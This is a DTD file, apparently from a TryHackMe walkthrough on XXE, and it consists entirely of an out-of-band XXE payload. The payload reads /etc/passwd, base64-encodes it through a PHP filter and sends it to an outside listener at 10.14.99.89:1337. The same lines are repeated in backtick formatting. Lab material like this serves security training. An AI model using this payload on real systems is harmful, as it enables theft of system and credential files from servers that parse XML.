TryHackMe/Walkthroughs/XXE/sample.dtd

<!ENTITY % cmd SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oobxxe "<!ENTITY exfil SYSTEM 'http://10.14.99.89:1337/?data=%cmd;'>">
%oobxxe;
	`<!ENTITY % cmd SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">`
	`<!ENTITY % oobxxe "<!ENTITY exfil SYSTEM 'http://10.14.99.89:1337/?data=%cmd;'>">`
	`%oobxxe;`